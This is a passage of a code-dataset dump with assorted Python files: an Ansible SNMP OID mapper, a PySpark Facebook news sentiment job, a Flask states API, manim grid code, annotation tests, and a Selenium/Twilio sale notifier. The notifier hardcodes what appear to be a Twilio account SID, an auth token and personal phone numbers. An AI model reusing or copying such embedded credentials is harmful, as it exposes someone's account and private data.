BuildPluginsJSCommand,\n\t\t\"build_bundle_js\": BuildBundleJSCommand,\n\t\t\"watch_bundle_js\": WatchBundleJSCommand,\n\t\t\"build_all_js\": BuildAllJSCommand,\n\t\t\"jshint\": JSHintCommand,\n\t\t\"node_tests\": NodeTestsCommand,\n\t\t\"install_node_dependencies\": NodeDependenciesCommand,\n\t\t\"extensive_test\": ExtensiveTestCommand,\n\t\t\"test\": SimpleTestCommand,\n\t\t\"js_coverage\": JSCoverageCommand,\n\t},\n)\n","sub_path":"pypi_install_script/Python-PouchDB-0.4.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"210091359","text":"#!/usr/bin/python\n\n#\n# Copyright (c) 2018 Juniper Networks, Inc. All rights reserved.\n#\n\nfrom ansible.module_utils.basic import AnsibleModule\n\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'network'}\n\nDOCUMENTATION = '''\n---\nThis is to map the given SNMP OID with the vendor and family and check for\nsupoorted device family.\n\noid_to_vendor_family:\n oid: The snmp OID from snmp_facts module return patameter.\n ansible_facts.ansible_sysobjectid.\n host: IP address\n hostname: hostname of the IP/host from snmp_facts module return parameter.\n ansible_facts.ansible_sysname.\n'''\n\nEXAMPLES = '''\noid_to_vendor_family:\n oid: \"1.3.6.1.4.1.2636.1.1.1.2.29\"\n host: \"10.155.67.7\"\n hostname: \"cloudcpe\"\n'''\n\nRETURN = '''\nReturns three parameters. The vendor,family and product for a given\nhost is returned back to the caller.\n'''\n\noid_mapping = {\n \"1.3.6.1.4.1.2636.1.1.1.4.82.8\": {\"vendor\": \"juniper\",\n \"family\": \"juniper-qfx\",\n \"product\": \"qfx5100\"},\n \"1.3.6.1.4.1.2636.1.1.1.4.82.5\": {\"vendor\": \"juniper\",\n \"family\": \"juniper-qfx\",\n \"product\": \"qfx5100\"},\n \"1.3.6.1.4.1.2636.1.1.1.2.29\": {\"vendor\": \"juniper\",\n \"family\": \"juniper-mx\",\n \"product\": \"mx240\"},\n \"1.3.6.1.4.1.2636.1.1.1.2.11\": {\"vendor\": \"juniper\",\n \"family\": \"juniper-mx\",\n \"product\": \"m10i\"},\n \"1.3.6.1.4.1.2636.1.1.1.2.57\": {\"vendor\": \"juniper\",\n \"family\": \"juniper-mx\",\n \"product\": \"mx80\"}\n}\n_output = {'job_log_message': '', 'oid_mapping': {}}\n\n\ndef find_vendor_family(module):\n\n mapped_value = {}\n\n if module.params['oid'] in oid_mapping:\n mapped_value['host'] = module.params['host']\n mapped_value['hostname'] = module.params['hostname']\n mapped_value.update(oid_mapping[module.params['oid']])\n _output['job_log_message'] += \"\\nTask: OID MAPPING: \" + \\\n \"vendor and product for the host: \" + \\\n mapped_value['host'] + \" is \" + str(mapped_value)\n else:\n _output['job_log_message'] += \"\\nTask: OID MAPPING: \" + \\\n \"device with oid \" + \\\n module.params['oid'] + \" NOT supported\"\n\n return mapped_value\n\n\ndef main():\n module = AnsibleModule(\n argument_spec=dict(\n oid=dict(required=True),\n host=dict(required=True),\n hostname=dict(required=True)\n ),\n supports_check_mode=True\n )\n\n mapped_value = find_vendor_family(module)\n\n _output['oid_mapping'] = mapped_value\n\n module.exit_json(**_output)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/config/fabric-ansible/ansible-playbooks/library/oid_to_vendor_family.py","file_name":"oid_to_vendor_family.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255046886","text":"# Huffington Post News Data - (2012-2016)\nimport sys\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\nfrom pyspark.sql import SparkSession\nfrom pyspark import SparkContext\nimport re \nfrom textblob import TextBlob \nfrom pyspark.sql.functions import *\nfrom pyspark.sql.types import *\nfrom pyspark.sql.functions import udf\nfrom pyspark.sql import SparkSession, functions, types\nimport pandas as pd\nimport glob\n\nsc =SparkContext.getOrCreate()\nspark = SparkSession(sc)\n\n###################################################\ndef main(inputs, output):\n\n\tnews_schema = types.StructType([\n\ttypes.StructField('id', types.IntegerType(), False),\n\ttypes.StructField('id2', types.IntegerType(), False),\t\n\ttypes.StructField('authors', types.StringType(), False),\n\ttypes.StructField('category', types.StringType(), False),\n\ttypes.StructField('date', types.StringType(), False),\n\ttypes.StructField('headline', types.StringType(), False),\n\ttypes.StructField('link', types.StringType(), False),\n\ttypes.StructField('short_description', types.StringType(), False),\n\ttypes.StructField('body', types.StringType(), False),])\n\n\tpd.set_option('display.max_colwidth', -1)\n\t# read multiple csv files\n\tnews_data = pd.concat([pd.read_csv(f) for f in glob.glob(inputs + '/*.csv')], ignore_index = True)\n\t# create pyspark dataframe\n\tdf_news_data = spark.createDataFrame(news_data,schema=news_schema)\n\n\t#### GET Facebook Related words \n\tFACEBOOK_Word_list = ['facebook']\n\tjoint_words = ['mark zuckerberg']\n\n \t## UDF to Filter out unwanted news ##############################################\n\t@functions.udf(returnType=types.StringType())\n\tdef filter_appl_news(body):\n\n\t\tbody = body.lower()\n\n\t\tstatus = 999\n\n\t\tfor word in body.split():\n\t\t\tif word in FACEBOOK_Word_list:\n\t\t\t\tstatus = 1\n\n\t\tif status != 1:\n\t\t\tfor word in joint_words:\n\t\t\t\tif word in body:\n \t\t\t\t\tstatus = 1\n\n\t\tif status == 1:\n\t\t\treturn 'FB'\n\n\t####################################################\n\t@functions.udf(returnType=types.StringType())\n\tdef count_company_frequency(body):\n\t\tbody = body.lower()\n\t\tcount = 0\n\t\tfor i in FACEBOOK_Word_list:\n\t\t\tcount = body.count(i) + count\n\t\t\t# if i in APPLE_Word_List:\n\t\treturn count\n\n\t###################################################\n\n\t# clean body ###########################################################################\n\t@functions.udf(returnType=types.StringType())\n\tdef clean_text(body):\n\t\tbody = body.encode('ascii', 'ignore').decode('ascii')\n\t\treturn ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t]) |(\\w+:\\/\\/\\S+)\", \" \", body).split())\n\n\t###################################################\n\t@functions.udf(returnType=types.FloatType())\n\tdef process_body(text):\n\t\tanalysis = TextBlob(text)\n\t\treturn analysis.sentiment.polarity\n\t###################################################\n\t# filter only facebook related news\n\tdf_headline = df_news_data.withColumn('company', filter_appl_news(df_news_data.body))\n\t# retain FB related records only\n\tdf_frequency = df_headline.filter(df_headline.company == 'FB')\n\t# count the number of times a the facebook related word is found in the body\n\tdf_frequency = df_frequency.withColumn('company_frequency', count_company_frequency(df_headline.body)) \n\t# retain the records if at least 1 facebook related word is present\n\tdf_frequency = df_frequency.filter(df_frequency.company_frequency >=1)\n\t# clean body text\n\tdf_cleaned = df_frequency.withColumn('body_clean', clean_text(df_frequency.body))\n\t# clean headline text\n\tdf_cleaned = df_cleaned.withColumn('headline_clean', clean_text(df_frequency.headline))\n\t# generate text sentiment from body_clean\n\tdf_sentiment = df_cleaned.withColumn('sentiment', process_body(df_cleaned.body_clean))\n\n\t# calculate median ############################################################################################################\n\tdf_sentiment.registerTempTable(\"medianTbl\")\n\tdf_median = spark.sql(\"SELECT date, percentile_approx(sentiment, 0.5) as median_sentiment from medianTbl group by date \")\n\tspark.catalog.dropTempView(\"medianTbl\")\n\n\t###### AGGREGATIONS ###################################################################\n\n\t## WEIGHTED SENTIMENTS\n\tdf_sentiment = df_sentiment.withColumn('weighted_sentiment', df_sentiment.company_frequency * df_sentiment.sentiment)\n\n\t# aggregations to generate features grouped by date\n\tdf_summary = df_sentiment.groupby(df_sentiment.date).agg(functions.count(df_sentiment.sentiment).alias('count_news'), \n\tfunctions.avg(df_sentiment.sentiment).alias('avg_sentiment'), \n\tfunctions.sum(df_sentiment.company_frequency).alias('sum_company_frequency'), \n\tfunctions.max(df_sentiment.company_frequency).alias('max_company_frequency'), \n\tfunctions.sum(df_sentiment.weighted_sentiment).alias('sum_weighted_sentiment'),\n\tfunctions.avg(df_sentiment.weighted_sentiment).alias('avg_weighted_sentiment_1') \n\t)\n\n\t# calculate avg_weighted_sentiment_2\n\tdf_summary = df_summary.withColumn('avg_weighted_sentiment_2', df_summary.sum_weighted_sentiment/df_summary.sum_company_frequency)\n\n\t# join df_summary and df_sentiment\n\tdf_summary = df_sentiment.join(df_summary, [df_summary.date==df_sentiment.date,df_summary.max_company_frequency==df_sentiment.company_frequency]).select(df_summary.date, \\\n\tdf_summary.count_news,df_summary.avg_sentiment,df_summary.sum_company_frequency,df_summary.max_company_frequency, \\\n\tdf_summary.sum_weighted_sentiment, df_summary.avg_weighted_sentiment_1,df_summary.avg_weighted_sentiment_2,df_sentiment.headline.alias('headline_original'), df_sentiment.headline_clean)\n\n\t# join the df_summary dataframe with df_median on date field\n\tdf_summary = df_summary.join(df_median, ['date'])\n\n\t# Select the required fields\n\tdf_summary = df_summary.select(df_summary.date, \\\n\tdf_summary.count_news,df_summary.avg_sentiment,df_summary.median_sentiment, df_summary.sum_company_frequency,df_summary.max_company_frequency, \\\n\tdf_summary.sum_weighted_sentiment, df_summary.avg_weighted_sentiment_1,df_summary.avg_weighted_sentiment_2, \\\n\tdf_summary.headline_original, df_summary.headline_clean)\n\t\n\t# drop duplicates (if any)\n\tdf_summary = df_summary.dropDuplicates(['date'])\n\n\t# save the output as 1 csv file\n\tdf_summary.repartition(1).write.csv(output,header=True)\n\n\t###################################################\nif __name__ == '__main__':\n\tinputs = sys.argv[1]\n\toutput = sys.argv[2]\n\tmain(inputs,output)\n\n","sub_path":"HuffingtonNewsSentimentFacebook.py","file_name":"HuffingtonNewsSentimentFacebook.py","file_ext":"py","file_size_in_byte":6320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487292760","text":"import os, sys\n\nos.chdir(os.path.dirname(__file__))\nsys.path.append(os.path.dirname(__file__))\n\n\ndef app(environ, start_response):\n header = [(\"Content-Type\", \"text/html\")]\n start_response(\"200 OK\", header)\n content = \"TEST OUTPUT!\"\n return [content]\n\napplication = app\n\nif __name__ == '__main__':\n from werkzeug.serving import run_simple\n\n run_simple('localhost', 8080, application, use_reloader=True, use_debugger=True)","sub_path":"Testing/webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"565388240","text":"from manimlib.imports import *\n\nclass Grid(VGroup):\n CONFIG = {\n \"height\": 6.0,\n \"width\": 6.0,\n }\n\n def __init__(self, rows, columns, **kwargs):\n digest_config(self, kwargs, locals())\n super().__init__(**kwargs)\n\n x_step = self.width / self.columns\n y_step = self.height / self.rows\n\n for x in np.arange(0, self.width + x_step, x_step):\n self.add(Line(\n [x - self.width / 2., -self.height / 2., 0],\n [x - self.width / 2., self.height / 2., 0],\n ))\n for y in np.arange(0, self.height + y_step, y_step):\n self.add(Line(\n [-self.width / 2., y - self.height / 2., 0],\n [self.width / 2., y - self.height / 2., 0]\n ))\n\n\nclass ScreenGrid(VGroup):\n CONFIG = {\n \"rows\": 8,\n \"columns\": 14,\n \"height\": FRAME_Y_RADIUS * 2,\n \"width\": 14,\n \"grid_stroke\": 0.5,\n \"grid_color\": WHITE,\n \"axis_color\": RED,\n \"axis_stroke\": 2,\n \"labels_scale\": 0.125,\n \"labels_buff\": 0,\n \"number_decimals\": 0\n }\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n rows = self.rows\n columns = self.columns\n grid = Grid(width=self.width, height=self.height, rows=rows, columns=columns)\n grid.set_stroke(self.grid_color, self.grid_stroke)\n\n vector_ii = ORIGIN + np.array((- self.width / 2, - self.height / 2, 0))\n vector_si = ORIGIN + np.array((- self.width / 2, self.height / 2, 0))\n vector_sd = ORIGIN + np.array((self.width / 2, self.height / 2, 0))\n\n axes_x = Line(LEFT * self.width / 2, RIGHT * self.width / 2)\n axes_y = Line(DOWN * self.height / 2, UP * self.height / 2)\n\n axes = VGroup(axes_x, axes_y).set_stroke(self.axis_color, self.axis_stroke)\n\n divisions_x = self.width / columns\n divisions_y = self.height / rows\n\n directions_buff_x = [UP, DOWN]\n directions_buff_y = [RIGHT, LEFT]\n dd_buff = [directions_buff_x, directions_buff_y]\n vectors_init_x = [vector_ii, vector_si]\n vectors_init_y = [vector_si, vector_sd]\n vectors_init = [vectors_init_x, vectors_init_y]\n divisions = [divisions_x, divisions_y]\n orientations = [RIGHT, DOWN]\n labels = VGroup()\n set_changes = zip([columns, rows], divisions, orientations, [0, 1], vectors_init, dd_buff)\n for c_and_r, division, orientation, coord, vi_c, d_buff in set_changes:\n for i in range(1, c_and_r):\n for v_i, directions_buff in zip(vi_c, d_buff):\n ubication = v_i + orientation * division * i\n coord_point = round(ubication[coord], self.number_decimals)\n label = Text(f\"{coord_point}\",font=\"Arial\",stroke_width=0).scale(self.labels_scale)\n label.next_to(ubication, directions_buff, buff=self.labels_buff)\n labels.add(label)\n\n self.add(grid, axes, labels)\n\n\n\ndef get_coords_from_csv(file_name):\n import csv\n coords = []\n with open(f'{file_name}.csv', 'r') as csvFile:\n reader = csv.reader(csvFile)\n for row in reader:\n x,y = row\n coord = [float(x),float(y)]\n coords.append(coord)\n csvFile.close()\n return coords\n\nclass ConstLattice(Scene):\n def construct(self):\n m = []\n n = []\n\n for i in range(2):\n i = float( input(\"Ingrese los escalares del primer vector, entrada [\"+str(i+1)+\"] : \"))\n m.append(i)\n print(\"\")\n\n for j in range(2):\n j = float( input(\"Ingrese los escalares del segundo vector, entrada [\"+str(j+1)+\"] : \"))\n n.append(j)\n \n n.append(0) \n m.append(0)\n\n v_1 = np.array(m)\n v_2 = np.array(n)\n \n screen_grid = ScreenGrid()\n self.add(screen_grid)\n \n self.play(FadeIn(Vector(v_1, color = BLUE)))\n self.play(FadeIn(Vector(v_2, color = GREEN)))\n\n vectors1 = {}\n vectors2 = {}\n \n #coords = get_coords_from_csv(\"../custom_graphs/data\")\n #dots = self.get_dots_from_coords(coords)\n #self.add(dots)\n\n\n\n for i in range(-3, 3):\n vectors1[i] = i * v_1\n vectors2[i] = i * v_2\n self.play( FadeIn( Vector(vectors1[i], color = BLUE, stroke = 0.09), run_time = 0.125) )\n self.play( ReplacementTransform(Vector(vectors1[i]), Dot(vectors1[i])), run_time = 0.125 )\n self.play( FadeIn(Vector(vectors2[i], color = GREEN, stroke = 0.09), run_time = 0.125) )\n #self.play( ReplacementTransform(Vector(vectors2[i]), Dot(vectors2[i])), run_time = 0.125 )\n\n vector_sum = {}\n\n for j in reversed(range(-3, 3)):\n for i in reversed(range(-3, 3)):\n vector_sum[(i,j)] = (i * v_1) + (j * v_2)\n self.play(FadeIn(Vector(vector_sum[(i,j)], color = ORANGE, stroke = 0.09), run_time = 0.125))\n #self.play(ReplacementTransform(Vector(vector_sum[(i,j)]), Dot(vector_sum[(i,j)])), run_time = 0.125)\n\n# NO he logrado hacer que los arreglos comentados funcionen en Dot.\n\n self.wait(5)\n\n\n","sub_path":"Learning/PlotVarVect01.py","file_name":"PlotVarVect01.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"488825378","text":"#!/usr/bin/python3\n\"\"\"State views \"\"\"\nfrom models.state import State\nfrom flask import jsonify, abort, request, Flask\nfrom api.v1.views import app_views\nfrom models import storage\n\n\n@app_views.route('/states', methods=['GET'], strict_slashes=False)\ndef get_all_states():\n \"\"\"retrieves all state obj\"\"\"\n all_states = [obj.to_dict() for obj in storage.all(\"State\").values()]\n return jsonify(all_states)\n\n\n@app_views.route('/states/', methods=['GET'])\ndef get_a_state(state_id):\n \"\"\"retrieves state by state id\"\"\"\n obj = storage.get(\"State\", state_id)\n if obj is None:\n abort(404)\n return jsonify(obj.to_dict())\n\n\n@app_views.route('/states/', methods=['DELETE'])\ndef del_obj(state_id):\n \"\"\"deletes a state object\"\"\"\n obj = storage.get(\"State\", state_id)\n if obj is None:\n abort(404)\n obj.delete()\n storage.save()\n return jsonify({})\n\n\n@app_views.route('/states', methods=['POST'], strict_slashes=False)\ndef create_State():\n \"\"\"create a state obj\"\"\"\n if not request.get_json():\n return jsonify({'error': 'Not a JSON'}), 400\n if 'name' not in request.get_json():\n return jsonify({'error': 'Missing name'}), 400\n dic = request.get_json()\n obj = State(**dic)\n obj.save()\n return jsonify(obj.to_dict()), 201\n\n\n@app_views.route('/states/', methods=['PUT'])\ndef update_state(state_id):\n \"\"\"updates state object\"\"\"\n if not request.get_json():\n return jsonify({'error': \"Not a Json\"}), 400\n obj = storage.get(\"State\", state_id)\n if obj is None:\n abort(404)\n for k, v in request.get_json().items():\n if k not in ['id', 'created_at', 'updated_at']:\n setattr(obj, k, v)\n storage.save()\n return jsonify(obj.to_dict())\n","sub_path":"api/v1/views/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"52009023","text":"# Written By: Gil Rael\n# sales_notifier.py will notify Gil Rael via text message if item of interest\n# is found on Calibers' sales page\n\n# import required modules\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\n# this allows you to catch a thrown exception and add your own exception\n# so your script continues to run and exits normally\nfrom selenium.common.exceptions import NoSuchElementException\nfrom twilio.rest import TwilioRestClient\n\n\n# locate product of interest that is on sale at Calibers and send\n# ON SALE TODAY text message if item is on sale\n# or send NO SALE TODAY text message if item of interest is not on sale\n\ndef locate_sale_item():\n# open Firefox web browswer and maximize window\n driver = webdriver.Firefox()\n driver.maximize_window()\n# open Caliberusa.com sales page\n driver.get(\"https://www.calibersusa.com/all-products/browse/sale/yes/orderby/sort-by-sale/perpage/150\")\n driver.implicitly_wait(30)\n try:\n elem = driver.find_element_by_partial_link_text('One Year Dual Membership')\n if elem.is_displayed():\n elem.click() # this will click the element if it is there\n client = TwilioRestClient(\"AC2c8bb5d4f471c5ccf25765e4f757b030\", \"5183d8a42f3d1a9084a4325029132058\")\n# change the \"from_\" number to your Twilio number and the \"to\" number\n# to the phone number you signed up for Twilio with, or upgrade your\n# account to send SMS to any phone number\n client.messages.create(to=\"+15058330785\", from_=\"+15057966457\",\n\n body=\"Hello from Pi!.....ON SALE TODAY! : ) Time To Buy Calibers One Year Dual Membership\")\n except NoSuchElementException:\n client = TwilioRestClient(\"AC2c8bb5d4f471c5ccf25765e4f757b030\", \"5183d8a42f3d1a9084a4325029132058\")\n# change the \"from_\" number to your Twilio number and the \"to\" number\n# to the phone number you signed up for Twilio with, or upgrade your\n# account to send SMS to any phone number\n client.messages.create(to=\"+15058330785\", from_=\"+15057966457\",\n\n body=\"Hello from Pi!.....NO SALE TODAY : ( On Calibers One Year Dual Membership\")\n driver.quit()\nlocate_sale_item();\n","sub_path":"sales.py","file_name":"sales.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"115134337","text":"import os\nimport itertools\nimport random\n\n\nclass AWEData:\n\n def __init__(self, dataset_path):\n self.path = dataset_path\n\n def prepare_ann_files(self):\n # train data\n train_path = self.path + \"/train/\"\n train_subjects = sorted(filter(lambda f: not f.startswith('.'), os.listdir(train_path)))\n train_paths = []\n train_y = []\n for train_subject in train_subjects:\n subject_path = os.path.join(train_path, train_subject + \"/\")\n subject_samples = sorted(filter(lambda f: not f.startswith('.'), os.listdir(subject_path)))\n subject_train_paths = [\"\".join(item) for item in list(itertools.product([subject_path],\n list(subject_samples)))]\n train_paths += subject_train_paths\n train_y += [str(int(train_subject))] * len(subject_samples)\n\n # permute the data randomly and write it to the file\n combined = list(zip(train_paths, train_y))\n random.shuffle(combined)\n train_paths[:], train_y[:] = zip(*combined)\n with open(\"X_train.txt\", \"w\") as train_x_out:\n train_x_out.write(\"\\r\\n\".join(train_paths))\n\n with open(\"y_train.txt\", \"w\") as train_y_out:\n train_y_out.write(\"\\r\\n\".join(train_y))\n\n print(\"Found\", len(train_paths), \"training samples!\")\n\n # validation data\n val_path = self.path + \"/val/\"\n val_subjects = sorted(filter(lambda f: not f.startswith('.'), os.listdir(val_path)))\n val_paths = []\n val_y = []\n for val_subject in val_subjects:\n subject_path = os.path.join(val_path, val_subject + \"/\")\n subject_samples = sorted(filter(lambda f: not f.startswith('.'), os.listdir(subject_path)))\n subject_val_paths = [\"\".join(item) for item in\n list(itertools.product([subject_path], list(subject_samples)))]\n val_paths += subject_val_paths\n val_y += [str(int(val_subject))] * len(subject_samples)\n\n # permute the data randomly and write it to the file\n combined = list(zip(val_paths, val_y))\n random.shuffle(combined)\n val_paths[:], val_y[:] = zip(*combined)\n with open(\"X_test.txt\", \"w\") as test_x_out:\n test_x_out.write(\"\\r\\n\".join(val_paths))\n\n with open(\"y_test.txt\", \"w\") as test_y_out:\n test_y_out.write(\"\\r\\n\".join(val_y))\n\n print(\"Found\", len(val_paths), \"training samples!\")\n\n # label map\n label_map = list(map(lambda x: str(int(x)), train_subjects))\n label_map = list(zip(label_map, label_map))\n with open(\"label_map.txt\", \"w\") as label_map_out:\n label_map_out.write('\\r\\n'.join('%s,%s' % x for x in label_map))\n\n\nif __name__ == '__main__':\n awe_data = AWEData(\"AWE_dataset\")\n awe_data.prepare_ann_files()\n","sub_path":"data/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"186615418","text":"from Tools.AudioTools import wav2vc\nfrom Tools.AudioTools import speaker_verification\n\ndef find_related_file(file_type_to_search, file_begin = ''):\n res = []\n with open('audio_type.txt', 'r') as f:\n tmp = f.readline()\n while tmp:\n file_dir, file_name, file_type = tmp.split(' ')\n file_type = list(map(lambda x: int(x), file_type[1:-2].split(',')))\n if file_type_to_search in file_type:\n tmp_wav_to_add = file_dir + '//' +file_name\n if file_begin != '':\n tmp_wav_to_add = file_begin + tmp_wav_to_add\n res.append(tmp_wav_to_add)\n tmp = f.readline()\n return res\n\ndef file_path_to_name(path):\n return path.split('//')[1]\n\nif __name__ == '__main__':\n test_data = find_related_file(0, file_begin='train_wav//')\n print('The number of this kind is {} '.format(len(test_data)))\n\n res = []\n #vq_test\n len_test_data = len(test_data)\n for test_number in range(len(test_data)):\n target = wav2vc(test_data[test_number])\n target_name = file_path_to_name(test_data[test_number])\n\n tmp_data = []\n for i in range(1, len(test_data)):\n if i % 100 == 0:\n print('{} dealing {}'.format(test_number, i))\n if i == test_number:\n continue\n tmp_data.append([i, test_data[i], speaker_verification(target, test_data[i])])\n\n tmp_data_sorted_reverse = sorted(tmp_data, key=lambda x:x[2])\n nearest_number = 0\n for i in tmp_data_sorted_reverse:\n nearest_number = nearest_number + 1\n if file_path_to_name(i[1]) == target_name:\n res.append([test_number, float(nearest_number) / len_test_data ])\n\n if test_number == 5:\n break\n for i in res:\n print(i)","sub_path":"resource/audio_train_data/find_related_audio.py","file_name":"find_related_audio.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"329491810","text":"n = int(input('Número: '))\r\ncont = 0\r\nfor i in range(2,n):\r\n if(n%i==0):\r\n cont+=1\r\nelse:\r\n if(cont>0):\r\n print(\"Não é primo\") \r\n else:\r\n print(\"É primo\") ","sub_path":"primo.py","file_name":"primo.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"317961097","text":"__author__ = 'fengpeng'\n\n\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution(object):\n def __init__(self):\n pass\n\n def oddEvenList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head:\n return None\n dummyOdd = preOdd = ListNode(0)\n dummyEven = preEven = ListNode(0)\n cur = head\n idx = 1\n while cur is not None:\n if idx % 2 == 0:\n preEven.next = cur\n preEven = preEven.next\n else:\n preOdd.next = cur\n preOdd = preOdd.next\n cur = cur.next\n idx += 1\n preEven.next = None\n preOdd.next = dummyEven.next\n return dummyOdd.next\n\n def oddEvenList2(self, head):\n if not head or not head.next:\n return head\n odd, even, evenHead = head, head.next, head.next\n while even and even.next:\n odd.next = odd.next.next\n even.next = even.next.next\n odd = odd.next\n even = even.next\n odd.next = evenHead\n return head\n\n\nhead=ListNode(1)\nhead.next=ListNode(2)\nhead.next.next=ListNode(3)\nhead.next.next.next=ListNode(4)\n\nSolution().oddEvenList2(head)\n\n\n","sub_path":"Odd_Even_Linked_List/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"222199209","text":"from ChildProject.projects import ChildProject, RecordingProfile\nfrom ChildProject.annotations import AnnotationManager\nfrom ChildProject.tables import IndexTable\nimport pandas as pd\nimport numpy as np\nimport os\nimport pytest\nimport shutil\nimport subprocess\nimport sys\n\n@pytest.fixture(scope='function')\ndef project(request):\n if not os.path.exists(\"output/annotations\"):\n project = ChildProject(\"examples/valid_raw_data\")\n project.import_data(\"output/annotations\")\n\n project = ChildProject(\"output/annotations\")\n yield project\n \n os.remove(\"output/annotations/metadata/annotations.csv\")\n shutil.rmtree(\"output/annotations/annotations\")\n os.mkdir(\"output/annotations/annotations\")\n\ndef test_import(project):\n am = AnnotationManager(project)\n\n input_annotations = pd.read_csv('examples/valid_raw_data/raw_annotations/input.csv')\n am.import_annotations(input_annotations)\n am.read()\n \n assert am.annotations.shape[0] == input_annotations.shape[0], \"imported annotations length does not match input\"\n\n assert all([\n os.path.exists(os.path.join(project.path, 'annotations', f))\n for f in am.annotations['annotation_filename'].tolist()\n ]), \"some annotations are missing\"\n\n errors, warnings = am.validate()\n assert len(errors) == 0 and len(warnings) == 0, \"malformed annotations detected\"\n\n for dataset in ['eaf', 'textgrid', 'eaf_solis']:\n annotations = am.annotations[am.annotations['set'] == dataset]\n segments = am.get_segments(annotations)\n segments.drop(columns = annotations.columns, inplace = True)\n\n pd.testing.assert_frame_equal(\n segments.sort_index(axis = 1).sort_values(segments.columns.tolist()).reset_index(drop = True),\n pd.read_csv('tests/truth/{}.csv'.format(dataset)).sort_index(axis = 1).sort_values(segments.columns.tolist()).reset_index(drop = True),\n check_less_precise = True\n )\n\ndef test_intersect(project):\n am = AnnotationManager(project)\n\n input_annotations = pd.read_csv('examples/valid_raw_data/raw_annotations/intersect.csv')\n am.import_annotations(input_annotations)\n am.read()\n\n a, b = am.intersection(\n am.annotations[am.annotations['set'] == 'textgrid'],\n am.annotations[am.annotations['set'] == 'vtc_rttm']\n )\n \n pd.testing.assert_frame_equal(\n a.sort_index(axis = 1).sort_values(a.columns.tolist()).reset_index(drop = True).drop(columns=['imported_at']),\n pd.read_csv('tests/truth/intersect_a.csv').sort_index(axis = 1).sort_values(a.columns.tolist()).reset_index(drop = True).drop(columns=['imported_at'])\n )\n\n pd.testing.assert_frame_equal(\n b.sort_index(axis = 1).sort_values(b.columns.tolist()).reset_index(drop = True).drop(columns=['imported_at']),\n pd.read_csv('tests/truth/intersect_b.csv').sort_index(axis = 1).sort_values(b.columns.tolist()).reset_index(drop = True).drop(columns=['imported_at'])\n )\n\ndef test_clipping(project):\n am = AnnotationManager(project)\n\n input_annotations = pd.read_csv('examples/valid_raw_data/raw_annotations/input.csv')\n am.import_annotations(input_annotations)\n am.read()\n\n start = 1981\n stop = 1984\n segments = am.get_segments(am.annotations[am.annotations['set'] == 'vtc_rttm'])\n segments = am.clip_segments(segments, start, stop)\n \n assert segments['segment_onset'].between(start, stop).all() and segments['segment_offset'].between(start, stop).all(), \"segments not properly clipped\"\n assert segments.shape[0] == 2, \"got {} segments, expected 2\".format(segments.shape[0])\n\nthresholds = [0, 0.5, 1]\n@pytest.mark.parametrize('turntakingthresh', thresholds)\n@pytest.mark.skipif(tuple(map(int, pd.__version__.split('.')[:2])) < (1,1), reason = \"requires pandas>=1.1.0\")\ndef test_vc_stats(project, turntakingthresh):\n am = AnnotationManager(project)\n am.import_annotations(pd.read_csv('examples/valid_raw_data/raw_annotations/input.csv'))\n\n raw_rttm = 'example_metrics.rttm'\n segments = am.annotations[am.annotations['raw_filename'] == raw_rttm]\n \n vc = am.get_vc_stats(am.get_segments(segments), turntakingthresh = turntakingthresh).reset_index()\n truth_vc = pd.read_csv('tests/truth/vc_truth_{:.1f}.csv'.format(turntakingthresh))\n \n pd.testing.assert_frame_equal(\n vc.reset_index().sort_index(axis = 1).sort_values(vc.columns.tolist()),\n truth_vc.reset_index().sort_index(axis = 1).sort_values(vc.columns.tolist()),\n atol = 3\n )","sub_path":"tests/test_annotations.py","file_name":"test_annotations.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"190851592","text":"import math\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nfrom networkx.drawing.nx_agraph import graphviz_layout\n\nimport py_ast\n\n# import pygraphviz as pgv\n\n\nlabels = {}\nsizes = {}\n\n\ndef travel_tree(ast_g, node: py_ast.Node, dep):\n if node.type == py_ast.Type.ExpVoid:\n return\n ast_g.add_node(node)\n sizes[node] = 1000 / (math.log10(dep) + 1)\n if not node.children:\n labels[node] = node.GetTokenSymbol()\n else:\n labels[node] = node.type.name\n for c in node.children:\n if not c.type == py_ast.Type.ExpVoid:\n ast_g.add_edge(node, c)\n travel_tree(ast_g, c, dep+1)\n\n\nG = 